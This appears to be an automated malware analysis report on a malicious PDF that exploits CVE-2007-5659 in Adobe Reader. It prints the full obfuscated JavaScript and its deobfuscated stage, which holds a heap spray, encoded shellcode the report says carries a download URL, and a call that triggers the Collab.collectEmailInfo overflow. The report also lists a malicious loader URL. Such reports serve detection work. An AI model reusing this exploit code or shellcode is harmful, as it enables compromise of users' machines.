Malicious PDF — malware analysis report

Static analysis result for SHA-256 5520b7675f8e8498…

MALICIOUS

PDF

4.5 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 5f3eaa7d0ccf89b7e45927ed501239f4 SHA-1: 4811d04b99f133f6d12af9e4e4d5a89c5d7d7da4 SHA-256: 5520b7675f8e8498a0d2cc20d0a3824d495755ceef97f468718634a172be85eb
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

This PDF file contains obfuscated JavaScript, indicated by the PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL heuristics. The JavaScript stream, named 'javascript_obj0013_001.js', likely attempts to download and execute a second-stage payload, as suggested by the presence of an eval() call and script obfuscation indicators. The exact nature of the payload cannot be determined due to the obfuscation, leading to an unknown family classification and a moderate confidence score.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function WeSzj7W(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function dhG11eg758(jPHGEYQdB9lR5u){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(jPHGEYQdB9lR5u)"+";"+"}");eval("function X8KTHaHzji6(XoUIic){var Th9Gw9EHT3i="+"0,GLRQ6Vz=XoUIic.l"+"en"+"gth,KN5Uz=10"+"2"+"4,tTTPkT9TYaaN5,ohKI4,d9HiGL6Lp6Xd='',o3JUB=Th9Gw9EHT3i,MlMPp=Th9Gw9EHT3i,AXZoaLXjcF=Th9Gw9EHT3i,WLLoQsSztVJNg6=Ar"+"ra"+"y(63,53,5,33,25,2 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=4030&spl=4 Referenced by PDF JavaScript

Related samples 8

Ranked by shared artifacts, heuristics, extracted URLs, CVEs, and signatures.

Full JSON: related samples API

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x365 6276 bytes
SHA-256: c9002fe7809a135a94fc321ee1e945987289cecf21493eab90c2cc377a260676
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function WeSzj7W(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function dhG11eg758(jPHGEYQdB9lR5u){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(jPHGEYQdB9lR5u)"+";"+"}");eval("function X8KTHaHzji6(XoUIic){var Th9Gw9EHT3i="+"0,GLRQ6Vz=XoUIic.l"+"en"+"gth,KN5Uz=10"+"2"+"4,tTTPkT9TYaaN5,ohKI4,d9HiGL6Lp6Xd='',o3JUB=Th9Gw9EHT3i,MlMPp=Th9Gw9EHT3i,AXZoaLXjcF=Th9Gw9EHT3i,WLLoQsSztVJNg6=Ar"+"ra"+"y(63,53,5,33,25,28,21,61,57,15,0,0,0,0,0,0,54,22,45,32,30,7,58,59,19,11,27,34,1,20,40,14,2,46,4,39,62,56,9,43,48,35,49,0,0,0,0,0,0,38,50,8,41,60,6,42,52,18,10,51,3,17,47,29,37,26,23,24,31,12,13,16,55,44,36);f"+"o"+"r(ohKI4=M"+"at"+"h.c"+"ei"+"l(GLRQ6Vz/"+"KN5Uz)"+";ohKI4>Th9Gw9EHT3i;ohKI4-"+"-){fo"+"r(tTTPkT9TYaaN5=Ma"+"th.m"+"in(GLRQ6Vz,KN5Uz);tTTPkT9TYaaN5>Th9Gw9EHT3i;tTTPkT9TYaaN5-"+"-,GLRQ6Vz-"+"-){AXZoaLXjcF|"+"=(WLLoQsSztVJNg6[XoUIic.cha"+"rCod"+"eAt(o3JUB+"+"+)-48])<"+"<MlMPp;if(MlMPp){d9HiGL6Lp6Xd+"+"=dhG11eg758"+"(109^AXZoaLXjcF&"+"2"+"5"+"5);AXZoaLXjcF>"+">="+"8;MlMPp-"+"="+"2;}el"+"se{MlMPp="+"6"+";}}"+"}return (d9HiGL6Lp6Xd);}var VSqHhLoH0=implode('',['vBLlthR925LIp','XX','L_C3lN_KrvL6HlCCfvZbEtX_','2','2mz6vB','_flUwf','RcX_vpXL','PUL6sMhLg','c_jEcw2','oRi','9','L1MPKX','ZVrwMHAhzf2w','w_chMmENK_N','5C_','6h','m','c','7uM_cu','CP4MXmt26PKXZV','rwz2ENK','_N5C_','6h','mc7hzmw1hLgc_jE','cw2oRi9A','LmHENK_N5','C','_6hmc7hRMvoCjPCbLP','MmE3h','kwDCZlDzZERu','CP216w','VcPES53wtmz6','v7LP4CZElhhLgc_j','Ecw2oRi9A','1RR','vB_flU','wfRcX_vmwfQRb','jNMR','mv4mHJXXEv4w28wKAYU','3PchR','Mv162','o8','w','r','O','hplo8','C','6vB','Llt','hh','9Yy','HfdeLV4CmLEzKPzhRMv3Z_cU3','luhLP','27Riszpr','482iszpr482iszpr4','82ish1','jNePis','Up','rs7Pisy1AQw2isM6rnw2isM6r','oZ2','isCbjD82is','Cbr482isCbI','WX','PisCi6o32isybjNUP','isyb','jWyPi','sM1IqBPis','z','b','j4','3PisCbjNyPisy6ANyP','isCKryyPisw1jJp2isz1','rWU2is','w1jJp2isy','2jNN2isCbj','o82isCbjNePisy6ANyPi','seP6o82isy2r6d2','isC','Pr','yX2','ishpAo8','2is','Cbj','5','Z2isCbjNyPisXPIJB2iseP6N','eP','isNpA','6d2isy2A5','Z2ishp','A','NX2is','Cbj5BPis','CbjNyP','isXP','IJ','B2is','e','P','6NN2isUPI','6d2is','X6rsBPishp','Atp','PisC','bjop','PisCbjNyPisXPIJB','2iseP6NU2ish','6r6d2','ish1jtZ2ishpA6BPisC','b','jD7PisCb','jNyP','isX','PIJ','B2i','s','eP','6WyPi','s','e2j6d2is','h2IMB2ishpAsd2isCbjtm2isCbj','NyPi','s','XPIJB','2isXbjWePisz','K','A','J','BPisw2','It8Pi','sy','1A532i','syKAyXPisCi6oB2i','s','Cbj','NCPis','eP','rNyPisw2','IJB2is','y','6AQe','P','is','C','b','IyXPi','sCPj632isy6Any2isyKAnXPi','s','hpAnw2isCbjJp2is','CbjNyP','isM','pAn','y','Pis','yPAdw2isw1jQh2is','N66o','d2','isCbjNyPi','sy','1ANyPisyK','ryXPise','2','IJ','p2i','se','1jJ8Pisy1An','yPisUbjy','XPis','X6r6d2i','sCb','jNyP','isebjNy','Pis','XPIJp2isM2AWe','PisebA','NzPise','PIJp2is','hpAWN2isC','bj63Pi','s','CbjNy','PisX','PINUPi','se','66QyPi','seKrNyPi','s','UPrM','Z2','ise666','ZPisC','b','IyyPisM','2IMd2i','sCbjNyPisw2I512isy6AQyPis','CKr','yXPisCPj63','2','is','y6Any2isyKA','nXPisXbjod','2is','CbjNyPisM','2ANyP','iseK','ANM2is','X','PINUPisz','KIQePi','seKIDp','2isX6rnUPi','s','Ub','jMZPiseKI','nyPisXPIJp2isM2AWU','2','isebANXPisePIJp2ishpAWN2i','s','Cb','jQUPisCbjNyP','isCbj632isw2I512','isy6','AQyPisCKAyXPis','Ci','j','632isy6An','y2i','syKAnXPisybj','o','d2is','CbjNyP','i','sM2ANyPisy6','A512isy','bjyXP','isCPj632isy6Any2isyK','AnXPis','Cbj','od2','i','sCbjN','yPisXP','jNyPis','eijn','z2ish2jN','UPish2','jNUPish2jNUPish2jNUPishpr','J8P','isePA','NeP','isy6AnUPis','h6','jD32i','seij562ish1','j512isy','6A','nX','Pisy','6Ao82isCKA','M','72i','s','e','b','rJp2i','seP6NU2iswp','I','Jp','2','isy6','AdU2','isyPrM7Pis','C','KIMd2iseP','658Pisw','26Jp2','i','sCKIQyPiszKI58PisXbAtB2i','sz1','ryCPisep','IN','UPiszKInw2isCi','r5','m2','i','s','ybjsZ2isX6jdC2isCKAM','7Pis','e','2rt3Pi','s','CKI','Ne2i','sXbj5pPisX2','jop','2isX2','rdz2isw2','In','X','2isePAoZPish6A','Jp2is','e','PA','Jp2','i','s','CKIQePi','s','M26D','72isCK','rJp','2isy6Ayz2is','yKrn','C2','isU1rNUP','isCbIJp','2i','sCKIJp','2','iseP','r','tZPi','se6jne2isCbjNN2','isX','1Iod2isX','6r5Z2','isePI512','isXKrnz','PisXir','y','e2i','s','CbjyX2i','sN6AJ62isN6rqp2ise1jDZP','isy2r','tBPisy1','rJ72','isU2','6','D','Z2ise2','jD','72is','y2jJ82isy2AtBPisN','6','rq','62isypItBPisy2rJ','B','Pis','e2jJp2is','y66q12','isU1jq12isy6AJm2i','sU6ADpP','isUprD12ise1AD12isN','6rq82is','U6jJ8Pish6','rDp1HR46H','JXXEvLP9UXm','67hRM','v16241','6ro1','6r','A1hf','u','e','m','HTwb9UXCV','KMiAOwmHw1h9YyHf','deLV4','CmLEzKP','z','uM_c','uC','P4','MwHE1hr','A1hfuemHVcP','ES5m','Hw1R','ceClE61HH','_1MmTwb9UXCV','KMi','AOw3mo','6','3r6mz6','vB','LlthhLgc_jE','cw2oRi9vL6','Hsu','_PDU_loCwm93Rf','M1','26o3RfM126o7Rm','A1hLgc_jEcw2oRi9','v','L6HV5C_','Dw','2f2oCjPCbLPMmE','3hHw','vpCc','55b','2','R46HJ','XXEv3_vtzX','c9MmPz__IqmZlvL6H24w28wKAYU3','Pc','hRwv162416ro16','rRVRceClE61Y6v','BC_thMmJXXE','v1LOIhZ','Lay','i','LPM','lM','o4','6','EUywEEsbj2cwvm3_vtz','Xc9MmPz','__IqmZlA1L','OIhZLayiL','PMYmfmMHAhR925L','IpXX','L_C3lN','_','K','r@hLO','IhZLayiLPMluv','L6HEN','K_N5C','_6hmc7hzmv7kc','Gz','mjtwi','fsM','XL','dN_V','A1RRvLmHICZ_','OzLLP','u','w','HDw_rs2P','VGhmf','5CbIsMRmv4mHJXXEv3K','j','l','w','_','6ehRMvZ','w','Eo','uh','fRCC','fce','Z','Oce3ERcX_l','p3_TzZERuCP2mz6','v3Kj','lw_6ehRMv3','K','jl','w','_','6euhEchm_uU_P2VMud','czPL7h','H','R46HJXXEvLC','cR','e1I4w6','r','U5X2d','hRMv','v_Pqh','RIt','e','Ll','MMR','jgu_LM','ZkwOM','_ltX','if212mL3','Kjlw_6','euzl2XXEyzmm5mMwNNb','_Rw29l8wLueLI4Mhr','Rmz6vmXPv6','Mm_c','PLt7ifM12OE5','mj','@h2uvL2','Mv66HIBMH','26R_KwXr','nz','L6o3kLrzKv5L','HHw','L6H51hiI1R_Kw','XrnzL6o','3kLrzKvtLHHm1h','rR1MRmhR','_K','wX','rnz','L6o','3kLrzKv5LHH','m1','RrRmM','HmRmH2LC','cR','e1I4','w6rU5X2','dsHrXhRMw1','z','AvBhivLC','cRe1I4w6rU5','X2dsl','rXh','MMvZ','2m','v','2mR','v6R','_KwX','rnzL6o3kLrzKvoLHHm','1zARmMH','AhRL4Ui','cWCimR46HJXXEvdLvDoYcv','L','6Hsu_PD','U_loCw','m93R','fo','8w','rOCRfo8wrOeRm','A1zf2','ww_','cMzfhU1vKu','M_c','uCP4MwHm','1MA4m2','At','mM','Hq','wYrxciHfL6Hqw','Y','rx','cK6v','pmLR','UZwOc','w_LXXlTz3_t','CwHw','1zIP','R','w_ueXwOcw','_LCC','l4CP_u','ww_zuXP','PMz2DCZl','E56H97Mw_','U3Pr1zfhU','1vK_LmA1RRvLmH','Dw','_rs2PVGhmf5CbIsMRmAL']);");eval(X8KTHaHzji6(VSqHhLoH0));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x365 2563 bytes
SHA-256: d772faa951635f96caad18962ed163511112bcf9b98142ba947b732ec711a41d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var QhzAHajmucEM3 = new Array(); function djos9u(jGoEjoxpLP, dOqJz) { while (jGoEjoxpLP.length*2<dOqJz){jGoEjoxpLP += jGoEjoxpLP;} jGoEjoxpLP = jGoEjoxpLP.substring(0,dOqJz/2); return jGoEjoxpLP; } function itCLFE() { var kxTI7Nsge = 0x0c0c0c0c; var RNVtDrItuhjDgI = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u343D%u3330%u2630%u7073%u3D6C%u0034"); var MQUq8P = 0x400000; var SIRUaKOH4cy = RNVtDrItuhjDgI.length * 2; var dOqJz = MQUq8P - (SIRUaKOH4cy+0x38); var jGoEjoxpLP = unescape("%u9090%u9090"); jGoEjoxpLP = djos9u(jGoEjoxpLP, dOqJz); var eYrdNbxdImA7yb = (kxTI7Nsge - 0x400000)/MQUq8P; for (var pUfpjKFhoX=0;pUfpjKFhoX<eYrdNbxdImA7yb;pUfpjKFhoX++) { QhzAHajmucEM3[pUfpjKFhoX] = jGoEjoxpLP + RNVtDrItuhjDgI; } } function si15LIVptqEBu() { var EGni9Q = app.viewerVersion.toString(); EGni9Q = EGni9Q.replace(/\D/g,""); var mOi2Bt90UjzD = new Array(EGni9Q.charAt(0),EGni9Q.charAt(1),EGni9Q.charAt(2)); if ((mOi2Bt90UjzD[0] == 8 && ((mOi2Bt90UjzD[1] == 1 && mOi2Bt90UjzD[2] < 2) || mOi2Bt90UjzD[1] < 1)) || (mOi2Bt90UjzD[0] == 7 && mOi2Bt90UjzD[1] < 1) || (mOi2Bt90UjzD[0] < 7)) { itCLFE(); var wY3ZO = unescape("%u0c0c%u0c0c"); while(wY3ZO.length < 44952) wY3ZO += wY3ZO; this.collabStore = Collab.collectEmailInfo({subj: "",msg: wY3ZO}); } } si15LIVptqEBu();

Open this report in the interactive analyzer, or submit your own file for analysis.